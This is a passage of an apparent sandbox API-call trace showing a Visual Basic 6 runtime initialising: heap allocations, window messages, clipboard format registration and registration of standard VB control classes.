Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0093.343] NtdllDefWindowProc_A (hWnd=0x50134, Msg=0x46, wParam=0x0, lParam=0x18fe34) returned 0x0 [0093.344] NtdllDefWindowProc_A (hWnd=0x50134, Msg=0x47, wParam=0x0, lParam=0x18fe34) returned 0x0 [0093.344] GetWindowThreadProcessId (in: hWnd=0x50134, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb44 [0093.344] VirtualQuery (in: lpAddress=0x18fea8, lpBuffer=0x18fe8c, dwLength=0x1c | out: lpBuffer=0x18fe8c*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0093.344] GetUserDefaultLCID () returned 0x409 [0093.344] IsValidCodePage (CodePage=0x3a4) returned 1 [0093.347] IsValidCodePage (CodePage=0x3b5) returned 1 [0093.348] IsValidCodePage (CodePage=0x3b6) returned 1 [0093.353] IsValidCodePage (CodePage=0x3a8) returned 1 [0093.359] GetUserDefaultLangID () returned 0x409 [0093.359] GetSystemDefaultLangID () returned 0x250409 [0093.360] GetSystemMetrics (nIndex=42) returned 0 [0093.360] IMalloc:Alloc (This=0x764066bc, cb=0xa8) returned 0x25d3d0 [0093.360] IMalloc:GetSize (This=0x764066bc, pv=0x25d3d0) returned 0xa8 [0093.360] IMalloc:Alloc (This=0x764066bc, cb=0xc) returned 0x25caf8 [0093.360] GetCurrentThreadId () returned 0xb44 [0093.360] IMalloc:Alloc (This=0x764066bc, cb=0x3c) returned 0x258cc0 [0093.360] IMalloc:Alloc (This=0x764066bc, cb=0x1c) returned 0x259488 [0093.362] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x18fe74 | out: phkResult=0x18fe74*=0x0) returned 0x2 [0093.362] IMalloc:Alloc (This=0x764066bc, cb=0x1c) returned 0x2594b0 [0093.362] GetCurrentThreadId () returned 0xb44 [0093.362] SetWindowsHookExA (idHook=-1, lpfn=0x729a1e09, hmod=0x0, dwThreadId=0xb44) returned 0x20255 [0093.362] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x14) returned 0x2342078 [0093.362] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x80) returned 0x2342098 [0093.363] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x10) returned 0x2342120 [0093.363] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x2c) returned 0x2342138 [0093.363] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBMsoStdCompMgr", lpWndClass=0x18fdcc | out: lpWndClass=0x18fdcc) returned 0 [0093.363] RegisterClassA (lpWndClass=0x18fdcc) returned 0x98c168 [0093.363] CreateWindowExA (dwExStyle=0x0, lpClassName="VBMsoStdCompMgr", lpWindowName=0x0, dwStyle=0x80000000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x50018 [0093.363] NtdllDefWindowProc_A (hWnd=0x50018, Msg=0x81, wParam=0x0, lParam=0x18fa08) returned 0x1 [0093.364] NtdllDefWindowProc_A (hWnd=0x50018, Msg=0x83, wParam=0x0, lParam=0x18f9f4) returned 0x0 [0093.364] NtdllDefWindowProc_A (hWnd=0x50018, Msg=0x1, wParam=0x0, lParam=0x18fa08) returned 0x0 [0093.364] NtdllDefWindowProc_A (hWnd=0x50018, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0093.364] NtdllDefWindowProc_A (hWnd=0x50018, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0093.364] SetWindowLongA (hWnd=0x50018, nIndex=0, dwNewLong=36970652) returned 0 [0093.365] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x38) returned 0x2342170 [0093.365] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x18) returned 0x23421b0 [0093.365] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x10) returned 0x23421d0 [0093.365] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0093.365] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0093.365] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0093.365] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0093.365] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d [0093.365] RegisterClipboardFormatA (lpszFormat="OwnerLink") returned 0xc003 [0093.365] RegisterClipboardFormatA (lpszFormat="FileName") returned 0xc006 [0093.365] CreateCompatibleDC (hdc=0x0) returned 0xf010849 [0093.366] GetCurrentObject (hdc=0xf010849, type=0x7) returned 0x185000f [0093.366] CreateWindowExA (dwExStyle=0x0, lpClassName="VBFocusRT6", lpWindowName=0x0, dwStyle=0x40000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x50134, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x50016 [0093.366] NtdllDefWindowProc_A (hWnd=0x50016, Msg=0x81, wParam=0x0, lParam=0x18fa98) returned 0x1 [0093.366] NtdllDefWindowProc_A (hWnd=0x50016, Msg=0x83, wParam=0x0, lParam=0x18fa84) returned 0x0 [0093.366] NtdllDefWindowProc_A (hWnd=0x50016, Msg=0x1, wParam=0x0, lParam=0x18fa98) returned 0x0 [0093.367] NtdllDefWindowProc_A (hWnd=0x50016, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0093.367] NtdllDefWindowProc_A (hWnd=0x50016, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0093.367] NtdllDefWindowProc_A (hWnd=0x50134, Msg=0x210, wParam=0x1, lParam=0x50016) returned 0x0 [0093.367] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x18) returned 0x23421e8 [0093.367] RtlAllocateHeap (HeapHandle=0x2730000, Flags=0x8, Size=0x114) returned 0x27307d0 [0093.368] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x5c) returned 0x2342208 [0093.368] GetCurrentThreadId () returned 0xb44 [0093.368] GetCurrentThreadId () returned 0xb44 [0093.368] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x10) returned 0x2342270 [0093.368] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x30) returned 0x2342288 [0093.368] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x434) returned 0x23422c0 [0093.368] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x434) returned 0x2342700 [0093.369] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x3c) returned 0x2342b40 [0093.369] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x2342b88 [0093.369] lstrlenA (lpString="VB") returned 2 [0093.369] lstrlenA (lpString="CommandButton") returned 13 [0093.369] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x11) returned 0x2342ca8 [0093.370] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x28) returned 0x2342cc8 [0093.370] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0xd4) returned 0x2342cf8 [0093.371] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x44) returned 0x2342dd8 [0093.371] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x1c8) returned 0x2342e28 [0093.371] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x28) returned 0x2342ff8 [0093.371] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2343028 [0093.371] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x28) returned 0x2343048 [0093.371] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x2343078 [0093.372] lstrlenA (lpString="VB") returned 2 [0093.372] lstrlenA (lpString="Timer") returned 5 [0093.372] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x9) returned 0x2343198 [0093.372] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0xc) returned 0x23431b0 [0093.372] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x30) returned 0x23431c8 [0093.372] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x4) returned 0x2343200 [0093.372] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x9c) returned 0x2343210 [0093.372] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x23432b8 [0093.372] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x23432d8 [0093.372] lstrlenA (lpString="VB") returned 2 [0093.372] lstrlenA (lpString="Printer") returned 7 [0093.372] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0xb) returned 0x23433f8 [0093.373] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0xdc) returned 0x2343410 [0093.373] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x23434f8 [0093.373] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x2343518 [0093.373] lstrlenA (lpString="VB") returned 2 [0093.373] lstrlenA (lpString="Form") returned 4 [0093.373] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x8) returned 0x2343638 [0093.373] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x184) returned 0x2343648 [0093.373] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x7c) returned 0x23437d8 [0093.374] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x2f8) returned 0x2343860 [0093.374] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2343b60 [0093.374] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x2343b80 [0093.374] lstrlenA (lpString="VB") returned 2 [0093.374] lstrlenA (lpString="Screen") returned 6 [0093.374] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0xa) returned 0x2343ca0 [0093.374] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x2c) returned 0x2343cb8 [0093.375] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0xa0) returned 0x2343cf0 [0093.375] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2343d98 [0093.375] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x2343db8 [0093.375] lstrlenA (lpString="VB") returned 2 [0093.376] lstrlenA (lpString="Clipboard") returned 9 [0093.376] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0xd) returned 0x2343ed8 [0093.376] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x1c) returned 0x2343ef0 [0093.376] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x68) returned 0x2343f18 [0093.376] RtlReAllocateHeap (Heap=0x2340000, Flags=0x0, Ptr=0x2342ff8, Size=0x50) returned 0x2343f88 [0093.376] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2342ff8 [0093.376] RtlReAllocateHeap (Heap=0x2340000, Flags=0x0, Ptr=0x2343048, Size=0x50) returned 0x2343fe8 [0093.377] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x2344040 [0093.377] lstrlenA (lpString="VB") returned 2 [0093.377] lstrlenA (lpString="MDIForm") returned 7 [0093.377] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0xb) returned 0x2343048 [0093.377] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x184) returned 0x2344160 [0093.377] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x7c) returned 0x23442f0 [0093.377] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x2f8) returned 0x2344378 [0093.378] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2344678 [0093.378] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x2344698 [0093.378] lstrlenA (lpString="VB") returned 2 [0093.378] lstrlenA (lpString="App") returned 3 [0093.378] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x7) returned 0x2343018 [0093.378] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x84) returned 0x23447b8 [0093.378] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x148) returned 0x2344848 [0093.378] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2344998 [0093.378] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x23449b8 [0093.379] lstrlenA (lpString="VB") returned 2 [0093.379] lstrlenA (lpString="UserControl") returned 11 [0093.379] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0xf) returned 0x2343060 [0093.379] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x1e4) returned 0x2344ad8 [0093.379] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0xb0) returned 0x2344cc8 [0093.379] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x3a4) returned 0x2344d80 [0093.380] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2345130 [0093.380] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x2345150 [0093.380] lstrlenA (lpString="VB") returned 2 [0093.380] lstrlenA (lpString="PropertyPage") returned 12 [0093.380] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x10) returned 0x2345270 [0093.380] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x190) returned 0x2345288 [0093.380] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x88) returned 0x2345420 [0093.380] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x310) returned 0x23454b0 [0093.380] lstrcmpiA (lpString1="VB.MDIForm", lpString2="VB.PropertyPage") returned -1 [0093.381] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x23457c8 [0093.381] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x23457e8 [0093.381] lstrlenA (lpString="VB") returned 2 [0093.381] lstrlenA (lpString="UserDocument") returned 12 [0093.381] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x10) returned 0x2345908 [0093.381] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x1c8) returned 0x2345920 [0093.381] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0xa8) returned 0x2345af0 [0093.381] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x370) returned 0x2345ba0 [0093.381] RtlReAllocateHeap (Heap=0x2340000, Flags=0x0, Ptr=0x2343f88, Size=0x78) returned 0x2345f18 [0093.381] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2345f98 [0093.382] RtlReAllocateHeap (Heap=0x2340000, Flags=0x0, Ptr=0x2343fe8, Size=0x78) returned 0x2345fb8 [0093.382] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x20) returned 0x2343f88 [0093.383] RtlAllocateHeap (HeapHandle=0x2730000, Flags=0x8, Size=0x30) returned 0x27308f0 [0093.384] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0xa0) returned 0x2346038 [0093.384] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x28) returned 0x2343fb0 [0093.385] GetCurrentThreadId () returned 0xb44 [0093.385] GetCurrentThreadId () returned 0xb44 [0093.385] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x10) returned 0x2343fe0 [0093.386] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x23460e0 [0093.386] lstrlenA (lpString="VB") returned 2 [0093.386] lstrlenA (lpString="PictureBox") returned 10 [0093.386] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0xe) returned 0x2343ff8 [0093.386] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x16c) returned 0x2346200 [0093.386] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x68) returned 0x2346378 [0093.386] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x2c8) returned 0x23463e8 [0093.387] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2344010 [0093.387] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x23466b8 [0093.387] lstrlenA (lpString="VB") returned 2 [0093.387] lstrlenA (lpString="Label") returned 5 [0093.387] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x9) returned 0x23467d8 [0093.387] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x34) returned 0x23467f0 [0093.387] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0xf0) returned 0x2346830 [0093.387] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x48) returned 0x2346928 [0093.388] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x1f4) returned 0x2346978 [0093.388] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2346b78 [0093.388] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x2351400 [0093.389] lstrlenA (lpString="VB") returned 2 [0093.389] lstrlenA (lpString="TextBox") returned 7 [0093.389] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0xb) returned 0x2351520 [0093.389] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x38) returned 0x2351538 [0093.389] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x120) returned 0x2351578 [0093.390] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x60) returned 0x23516a0 [0093.390] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x250) returned 0x2351708 [0093.390] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2351960 [0093.390] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x2351980 [0093.390] lstrlenA (lpString="VB") returned 2 [0093.390] lstrlenA (lpString="Frame") returned 5 [0093.390] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x9) returned 0x2351aa0 [0093.390] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x24) returned 0x2351ab8 [0093.390] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0xb0) returned 0x2351ae8 [0093.390] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x34) returned 0x2351ba0 [0093.391] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x184) returned 0x2351be0 [0093.391] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2351d88 [0093.391] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x2352970 [0093.391] lstrlenA (lpString="VB") returned 2 [0093.391] lstrlenA (lpString="CheckBox") returned 8 [0093.392] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0xc) returned 0x2352aa8 [0093.392] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x28) returned 0x2352e90 [0093.392] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0xec) returned 0x2352ec0 [0093.392] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x48) returned 0x2352fb8 [0093.392] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x1f8) returned 0x2353008 [0093.392] RtlReAllocateHeap (Heap=0x2340000, Flags=0x0, Ptr=0x2345f18, Size=0xa0) returned 0x2353208 [0093.393] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2351da8 [0093.393] RtlReAllocateHeap (Heap=0x2340000, Flags=0x0, Ptr=0x2345fb8, Size=0xa0) returned 0x23532b0 [0093.393] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x2353358 [0093.393] lstrlenA (lpString="VB") returned 2 [0093.393] lstrlenA (lpString="OptionButton") returned 12 [0093.393] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x10) returned 0x2352ac0 [0093.393] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x28) returned 0x2345fb8 [0093.393] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0xd4) returned 0x2353478 [0093.393] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x4c) returned 0x2345f18 [0093.393] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x1c8) returned 0x2353558 [0093.394] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2351dc8 [0093.394] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x2353740 [0093.394] lstrlenA (lpString="VB") returned 2 [0093.394] lstrlenA (lpString="ComboBox") returned 8 [0093.394] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0xc) returned 0x2352ad8 [0093.394] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x108) returned 0x2355728 [0093.394] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x4c) returned 0x2355838 [0093.394] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x230) returned 0x2355890 [0093.395] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2351de8 [0093.395] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x2353868 [0093.395] lstrlenA (lpString="VB") returned 2 [0093.395] lstrlenA (lpString="ListBox") returned 7 [0093.395] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0xb) returned 0x2352af0 [0093.395] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x108) returned 0x2355ac8 [0093.395] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x54) returned 0x2355bd8 [0093.395] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x230) returned 0x2355c38 [0093.395] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2351e08 [0093.396] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x2353990 [0093.396] lstrlenA (lpString="VB") returned 2 [0093.396] lstrlenA (lpString="HScrollBar") returned 10 [0093.396] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0xe) returned 0x2352b08 [0093.396] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x24) returned 0x2345fe8 [0093.396] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x90) returned 0x2355e70 [0093.396] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x28) returned 0x2355f08 [0093.396] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x144) returned 0x2355f38 [0093.397] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2351e28 [0093.397] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x2353ab8 [0093.397] lstrlenA (lpString="VB") returned 2 [0093.397] lstrlenA (lpString="VScrollBar") returned 10 [0093.397] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0xe) returned 0x2352b20 [0093.397] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x24) returned 0x2356088 [0093.397] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x90) returned 0x23560b8 [0093.397] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x28) returned 0x2356150 [0093.397] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x144) returned 0x2356180 [0093.397] RtlReAllocateHeap (Heap=0x2340000, Flags=0x0, Ptr=0x2353208, Size=0xc8) returned 0x23562d0 [0093.398] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2351e48 [0093.398] RtlReAllocateHeap (Heap=0x2340000, Flags=0x0, Ptr=0x23532b0, Size=0xc8) returned 0x23563a0 [0093.398] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x2353be0 [0093.398] lstrlenA (lpString="VB") returned 2 [0093.398] lstrlenA (lpString="DriveListBox") returned 12 [0093.398] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x10) returned 0x2352b38 [0093.398] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x28) returned 0x2353208 [0093.398] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0xc0) returned 0x2353238 [0093.398] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x40) returned 0x2353300 [0093.398] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x1a0) returned 0x2356470 [0093.399] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2351e68 [0093.399] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x2353d08 [0093.399] lstrlenA (lpString="VB") returned 2 [0093.399] lstrlenA (lpString="DirListBox") returned 10 [0093.399] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0xe) returned 0x2352b50 [0093.399] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x28) returned 0x2356618 [0093.399] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0xc8) returned 0x2356648 [0093.399] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x50) returned 0x2356718 [0093.399] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x1b0) returned 0x2356770 [0093.399] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2351e88 [0093.399] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x2353e30 [0093.400] lstrlenA (lpString="VB") returned 2 [0093.400] lstrlenA (lpString="FileListBox") returned 11 [0093.400] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0xf) returned 0x2352b68 [0093.400] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x28) returned 0x2356928 [0093.400] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0xec) returned 0x2356958 [0093.400] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x58) returned 0x2356a50 [0093.400] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x1f8) returned 0x2356ab0 [0093.400] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2351ea8 [0093.400] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x2353f58 [0093.400] lstrlenA (lpString="VB") returned 2 [0093.400] lstrlenA (lpString="Menu") returned 4 [0093.400] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x8) returned 0x2353348 [0093.400] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x38) returned 0x2356cb0 [0093.400] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x4) returned 0x2344030 [0093.401] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0xb8) returned 0x2356cf0 [0093.401] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2351ec8 [0093.401] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x2354080 [0093.401] lstrlenA (lpString="VB") returned 2 [0093.401] lstrlenA (lpString="Shape") returned 5 [0093.401] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x9) returned 0x2352b80 [0093.401] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x1c) returned 0x2345f70 [0093.401] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x68) returned 0x2356db0 [0093.401] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0xfc) returned 0x2356e20 [0093.401] RtlReAllocateHeap (Heap=0x2340000, Flags=0x0, Ptr=0x23562d0, Size=0xf0) returned 0x2356f28 [0093.402] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x2351ee8 [0093.402] RtlReAllocateHeap (Heap=0x2340000, Flags=0x0, Ptr=0x23563a0, Size=0xf0) returned 0x2357020 [0093.402] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x114) returned 0x23541a8 